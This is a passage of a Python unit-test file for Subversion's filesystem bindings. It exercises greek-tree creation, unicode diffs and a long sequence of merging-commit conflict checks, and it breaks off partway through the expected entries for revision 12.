def svn_test__create_greek_tree_at(txn_root, root_dir):
for node in greek_tree_nodes:
path = core.svn_relpath_join(root_dir, node.path)
if node.contents is not None:
fs.make_file(txn_root, path)
svn_test__set_file_contents(txn_root, path, node.contents)
else:
fs.make_dir(txn_root, path)
return
def svn_test__create_greek_tree(txn_root):
return svn_test__create_greek_tree_at(txn_root, "")
class SubversionFSTestCase(unittest.TestCase):
"""Test cases for the Subversion FS layer"""
def log_message_func(self, items, pool):
""" Simple log message provider for unit tests. """
return b"Test unicode log message"
def setUp(self):
"""Load a Subversion repository"""
self.temper = utils.Temper()
(self.repos, self.repos_path, self.repos_uri) = self.temper.alloc_known_repo(
'trac/versioncontrol/tests/svnrepos.dump', suffix='-repository')
self.fs = repos.fs(self.repos)
self.rev = fs.youngest_rev(self.fs)
self.tmpfile = None
self.unistr = u'⊙_ʘ'
tmpfd, self.tmpfile = mkstemp()
tmpfp = os.fdopen(tmpfd, "wb")
# Use a unicode file to ensure proper non-ascii handling.
tmpfp.write(self.unistr.encode('utf8'))
tmpfp.close()
clientctx = client.svn_client_create_context()
clientctx.log_msg_func3 = client.svn_swig_py_get_commit_log_func
clientctx.log_msg_baton3 = self.log_message_func
providers = [
client.svn_client_get_simple_provider(),
client.svn_client_get_username_provider(),
]
clientctx.auth_baton = core.svn_auth_open(providers)
if isinstance(self.tmpfile, bytes):
tmpfile_bytes = self.tmpfile
else:
tmpfile_bytes = self.tmpfile.encode('UTF-8')
commitinfo = client.import2(tmpfile_bytes,
urljoin(self.repos_uri + b"/",b"trunk/UniTest.txt"),
True, True,
clientctx)
self.commitedrev = commitinfo.revision
def tearDown(self):
self.fs = None
self.repos = None
self.temper.cleanup()
if self.tmpfile is not None:
os.remove(self.tmpfile)
def test_diff_repos_paths_internal(self):
"""Test diffing of a repository path using the internal diff."""
# Test standard internal diff
fdiff = fs.FileDiff(fs.revision_root(self.fs, self.commitedrev), b"/trunk/UniTest.txt",
None, None, diffoptions=None)
diffp = fdiff.get_pipe()
diffoutput = diffp.read().decode('utf8')
diffp.close()
self.assertTrue(diffoutput.find(u'-' + self.unistr) > 0)
def test_diff_repos_paths_external(self):
"""Test diffing of a repository path using an external diff (if available)."""
# Test if this environment has the diff command, if not then skip the test
try:
diffout, differr = Popen(["diff"], stdin=PIPE, stderr=PIPE).communicate()
except OSError as err:
if err.errno == errno.ENOENT:
self.skipTest("'diff' command not present")
else:
raise err
fdiff = fs.FileDiff(fs.revision_root(self.fs, self.commitedrev), b"/trunk/UniTest.txt",
None, None, diffoptions=[])
diffp = fdiff.get_pipe()
diffoutput = diffp.read().decode('utf8')
diffp.close()
self.assertTrue(diffoutput.find(u'< ' + self.unistr) > 0)
# Helper: commit TXN, expecting either success or failure:
#
# If EXPECTED_CONFLICT is null, then the commit is expected to
# succeed. If it does succeed, set *NEW_REV to the new revision;
# raise error.
#
# If EXPECTED_CONFLICT is not None, it is either the empty string or
# the expected path of the conflict. If it is the empty string, any
# conflict is acceptable. If it is a non-empty string, the commit
# must fail due to conflict, and the conflict path must match
# EXPECTED_CONFLICT. If they don't match, raise Assertion error.
#
# If a conflict is expected but the commit succeeds anyway, raise
# Assertion error. If the commit fails but does not provide an error,
# raise Assertion error.
#
# This function was taken from test_commit_txn() in
# subversion/tests/libsvn_fs/fs-test.c but renamed to avoid confusion.
#
def check_commit_txn(self, txn, expected_conflict, pool=None):
if (isinstance(expected_conflict, bytes)
and not isinstance(expected_conflict, str)):
expected_conflict = expected_conflict.decode('utf-8')
new_rev = None
conflict = None
try:
conflict, new_rev = fs.commit_txn(txn, pool)
except core.SubversionException as e:
self.assertTrue(hasattr(e, 'conflict_p'))
conflict = e.conflict_p
if isinstance(conflict, bytes) and not isinstance(conflict, str):
conflict = conflict.decode('utf-8')
self.assertTrue(hasattr(e, 'new_rev'))
new_rev = e.new_rev
if e.apr_err == core.SVN_ERR_FS_CONFLICT:
self.assertIsNotNone(expected_conflict,
"commit conflicted at '%s', but no conflict expected"
% conflict if conflict else '(missing conflict info!)')
self.assertIsNotNone(conflict,
"commit conflicted as expected, "
"but no conflict path was returned ('%s' expected)"
% expected_conflict)
if expected_conflict:
self.assertEqual(conflict, expected_conflict,
"commit conflicted at '%s', but expected conflict at '%s'"
% (conflict, expected_conflict))
# The svn_fs_commit_txn() API promises to set *NEW_REV to an
# invalid revision number in the case of a conflict.
self.assertEqual(new_rev, core.SVN_INVALID_REVNUM,
"conflicting commit returned valid new revision")
else:
# commit may have succeeded, but always report an error
if new_rev != core.SVN_INVALID_REVNUM:
raise core.SubversionException(
"commit succeeded but something else failed",
e.apr_err, e)
else:
raise core.SubversionException(
"commit failed due to something other than conflict",
e.apr_err, e)
else:
# commit should have succeeded
self.assertNotEqual(new_rev, core.SVN_INVALID_REVNUM,
"commit failed but no error was returned")
self.assertIsNone(expected_conflict,
"commit succeeded that was expected to fail at '%s'"
% expected_conflict)
return new_rev
def test_basic_commit(self):
"""Test committing against an empty repository."""
# Prepare a filesystem
handle, repo_path, rep_uri = self.temper.alloc_empty_repo(
"-test-repo-basic-commit")
test_fs = repos.fs(handle)
# Save the current youngest revision.
before_rev = fs.youngest_rev(test_fs)
# Prepare a txn to recive the greek tree.
txn = fs.begin_txn2(test_fs,0, 0)
txn_root = fs.txn_root(txn)
# Paranoidly check that the current youngest rev is unchanged.
after_rev = fs.youngest_rev(test_fs)
self.assertEqual(before_rev, after_rev,
'youngest revision changed unexpectedly')
# Create the greek tree
svn_test__create_greek_tree(txn_root)
self.assertTrue(fs.is_txn_root(txn_root))
self.assertFalse(fs.is_revision_root(txn_root))
# Commit it.
_, after_rev = fs.commit_txn(txn)
self.assertNotEqual(after_rev, core.SVN_INVALID_REVNUM)
# Make sure it's a different revision than before.
self.assertNotEqual(after_rev, before_rev,
"youngest revision failed to change")
# Get root of the revision
revision_root = fs.revision_root(test_fs, after_rev)
self.assertFalse(fs.is_txn_root(revision_root))
self.assertTrue(fs.is_revision_root(revision_root))
# Check the tree.
svn_test__check_greek_tree(revision_root)
def test_merging_commit(self):
"""Commit with merging (committing against non-youngest)."""
# Python implementation of fs-test.c: merging_commit()
# Prepare a filesystem
handle, repo_path, rep_uri = self.temper.alloc_empty_repo(
"-test-repo-merging-commit")
test_fs = repos.fs(handle)
# initialize our revision number stuffs.
revisions = [core.SVN_INVALID_REVNUM] * 24
revision_count = 0
revisions[revision_count] = 0
revision_count += 1
########################################################################
# REVISION 0
########################################################################
# In one txn, create and commit the greek tree.
txn = fs.begin_txn2(test_fs, 0, 0)
txn_root = fs.txn_root(txn)
svn_test__create_greek_tree(txn_root)
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 1
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("iota", "This is the file 'iota'.\n"),
SubversionTestTreeEntry("A" , None),
SubversionTestTreeEntry("A/mu", "This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda", "This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha", "This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta", "This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma", "This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi", "This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho", "This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau", "This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/H", None),
SubversionTestTreeEntry("A/D/H/chi", "This is the file 'chi'.\n"),
SubversionTestTreeEntry("A/D/H/psi", "This is the file 'psi'.\n"),
SubversionTestTreeEntry("A/D/H/omega", "This is the file 'omega'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Let's add a directory and some files to the tree, and delete 'iota'
txn = fs.begin_txn2(test_fs, revisions[revision_count-1], 0)
txn_root = fs.txn_root(txn)
fs.make_dir(txn_root, "A/D/I")
fs.make_file(txn_root, "A/D/I/delta")
svn_test__set_file_contents(txn_root, "A/D/I/delta",
"This is the file 'delta'.\n")
fs.make_file(txn_root, "A/D/I/epsilon")
svn_test__set_file_contents(txn_root, "A/D/I/epsilon",
"This is the file 'epsilon'.\n")
fs.make_file(txn_root, "A/C/kappa")
svn_test__set_file_contents(txn_root, "A/C/kappa",
"This is the file 'kappa'.\n")
fs.delete(txn_root, "iota")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 2
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu", "This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/H", None),
SubversionTestTreeEntry("A/D/H/chi",
"This is the file 'chi'.\n"),
SubversionTestTreeEntry("A/D/H/psi",
"This is the file 'psi'.\n"),
SubversionTestTreeEntry("A/D/H/omega",
"This is the file 'omega'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# We don't think the A/D/H directory is pulling its weight...let's
# knock it off. Oh, and let's re-add iota, too.
txn = fs.begin_txn2(test_fs, revisions[revision_count-1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H")
fs.make_file(txn_root, "iota")
svn_test__set_file_contents(txn_root, "iota",
"This is the new file 'iota'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 3
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("iota",
"This is the new file 'iota'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Delete iota (yet again).
txn = fs.begin_txn2(test_fs, revisions[revision_count-1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "iota")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 4
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
########################################################################
# GIVEN: A and B, with common ancestor ANCESTOR, where A and B
# directories, and E, an entry in either A, B, or ANCESTOR.
#
# For every E, the following cases exist:
# - E exists in neither ANCESTOR nor A.
# - E doesn't exist in ANCESTOR, and has been added to A.
# - E exists in ANCESTOR, but has been deleted from A.
# - E exists in both ANCESTOR and A ...
# - but refers to different node revisions.
# - and refers to the same node revision.
#
# The same set of possible relationships with ANCESTOR holds for B,
# so there are thirty-six combinations. The matrix is symmetrical
# with A and B reversed, so we only have to describe one triangular
# half, including the diagonal --- 21 combinations.
#
# Our goal here is to test all the possible scenarios that can
# occur given the above boolean logic table, and to make sure that
# the results we get are as expected.
#
# The test cases below have the following features:
#
# - They run straight through the scenarios as described in the
# `structure' document at this time.
#
# - In each case, a txn is begun based on some revision (ANCESTOR),
# is modified into a new tree (B), and then is attempted to be
# committed (which happens against the head of the tree, A).
#
# - If the commit is successful (and is *expected* to be such),
# that new revision (which exists now as a result of the
# successful commit) is thoroughly tested for accuracy of tree
# entries, and in the case of files, for their contents. It is
# important to realize that these successful commits are
# advancing the head of the tree, and each one effective becomes
# the new `A' described in further test cases.
#
########################################################################
# (6) E exists in neither ANCESTOR nor A.
# (1) E exists in neither ANCESTOR nor B. Can't occur, by
# assumption that E exists in either A, B, or ancestor.
# (1) E has been added to B. Add E in the merged result.
txn = fs.begin_txn2(test_fs, revisions[0], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "theta")
svn_test__set_file_contents(txn_root, "theta",
"This is the file 'theta'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 5
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (1) E has been deleted from B. Can't occur, by assumption that
# E doesn't exist in ANCESTOR.
# (3) E exists in both ANCESTOR and B. Can't occur, by
# assumption that E doesn't exist in ancestor.
# (5) E doesn't exist in ANCESTOR, and has been added to A.
# (1) E doesn't exist in ANCESTOR, and has been added to B.
txn = fs.begin_txn2(test_fs, revisions[4], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "theta")
svn_test__set_file_contents(txn_root, "theta",
"This is another file 'theta'.\n")
# TXN must actually be based upon revisions[4] (instead of HEAD).
self.assertEqual(fs.txn_base_revision(txn), revisions[4])
failed_rev = self.check_commit_txn(txn, "/theta")
fs.abort_txn(txn)
# (1) E exists in ANCESTOR, but has been deleted from B. Can't
# occur, by assumption that E doesn't exist in ANCESTOR.
# (3) E exists in both ANCESTOR and B. Can't occur, by assumption
# that E doesn't exist in ANCESTOR.
self.assertEqual(failed_rev, core.SVN_INVALID_REVNUM)
# (4) E exists in ANCESTOR, but has been deleted from A
# (1) E exists in ANCESTOR, but has been deleted from B. If
# neither delete was a result of a rename, then omit E from the
# merged tree. Otherwise, conflict.
# ### cmpilato todo: the rename case isn't actually handled by
# merge yet, so we know we won't get a conflict here.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H")
# TXN must actually be based upon revisions[1] (instead of HEAD).
self.assertEqual(fs.txn_base_revision(txn), revisions[1])
# We used to create the revision like this before fixing issue
# #2751 -- Directory prop mods reverted in overlapping commits scenario.
#
# But we now expect that to fail as out of date
failed_rev = self.check_commit_txn(txn, "/A/D/H")
self.assertEqual(failed_rev, core.SVN_INVALID_REVNUM)
########################################################################
# REVISION 6
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Try deleting a file F inside a subtree S where S does not exist
# in the most recent revision, but does exist in the ancestor
# tree. This should conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H/omega")
failed_rev = self.check_commit_txn(txn, "/A/D/H")
fs.abort_txn(txn)
self.assertEqual(failed_rev, core.SVN_INVALID_REVNUM)
# E exists in both ANCESTOR and B ...
# (1) but refers to different nodes. Conflict.
txn = fs.begin_txn2(test_fs, after_rev, 0)
txn_root = fs.txn_root(txn)
fs.make_dir(txn_root, "A/D/H")
after_rev = self.check_commit_txn(txn, None)
revisions[revision_count] = after_rev
revision_count += 1
########################################################################
# REVISION 7
########################################################################
# Re-remove A/D/H because future tests expect it to be absent.
txn = fs.begin_txn2(test_fs, revisions[revision_count - 1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H")
after_rev = self.check_commit_txn(txn, None)
revisions[revision_count] = after_rev
revision_count += 1
########################################################################
# REVISION 8 (looks exactly like revision 6, we hope)
########################################################################
# (1) but refers to different revisions of the same node.
# Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/D/H/zeta")
after_rev = self.check_commit_txn(txn, "/A/D/H")
fs.abort_txn(txn)
# (1) and refers to the same node revision. Omit E from the
# merged tree. This is already tested in Merge-Test 3
# (A/D/H/chi, A/D/H/psi, e.g.), but we'll test it here again
# anyway. A little paranoia never hurt anyone.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/mu") # unrelated change
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 9
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Preparation for upcoming tests.
# We make a new head revision, with A/mu restored, but containing
# slightly different contents than its first incarnation.
txn = fs.begin_txn2(test_fs, revisions[revision_count - 1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/mu")
svn_test__set_file_contents(txn_root, "A/mu",
"A new file 'mu'.\n")
fs.make_file(txn_root, "A/D/G/xi")
svn_test__set_file_contents(txn_root, "A/D/G/xi",
"This is the file 'xi'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 10
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (3) E exists in both ANCESTOR and A, but refers to different
# nodes.
#
# (1) E exists in both ANCESTOR and B, but refers to different
# nodes, and not all nodes are directories. Conflict.
# ### kff todo: A/mu's contents will be exactly the same.
# If the fs ever starts optimizing this case, these tests may
# start to fail.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/mu")
fs.make_file(txn_root, "A/mu")
svn_test__set_file_contents(txn_root, "A/mu",
"This is the file 'mu'.\n")
after_rev = self.check_commit_txn(txn, "/A/mu")
fs.abort_txn(txn)
# (1) E exists in both ANCESTOR and B, but refers to different
# revisions of the same node. Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "A/mu",
"A change to file 'mu'.\n")
after_rev = self.check_commit_txn(txn, "/A/mu")
fs.abort_txn(txn)
# (1) E exists in both ANCESTOR and B, and refers to the same
# node revision. Replace E with A's node revision.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
old_mu_contents = svn_test__get_file_contents(txn_root, "A/mu")
if (not isinstance(old_mu_contents, str)
or old_mu_contents != "This is the file 'mu'.\n"):
raise core.SubversionException(
"got wrong contents from an old revision tree",
core.SVN_ERR_FS_GENERAL)
fs.make_file(txn_root, "A/sigma") # unrelated change
svn_test__set_file_contents(txn_root, "A/sigma",
"This is the file 'sigma'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 11
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Preparation for upcoming tests.
# We make a new head revision. There are two changes in the new
# revision: A/B/lambda has been modified. We will also use the
# recent addition of A/D/G/xi, treated as a modification to
# A/D/G.
txn = fs.begin_txn2(test_fs, revisions[revision_count - 1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "A/B/lambda",
"Change to file 'lambda'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 12
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"Change to file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
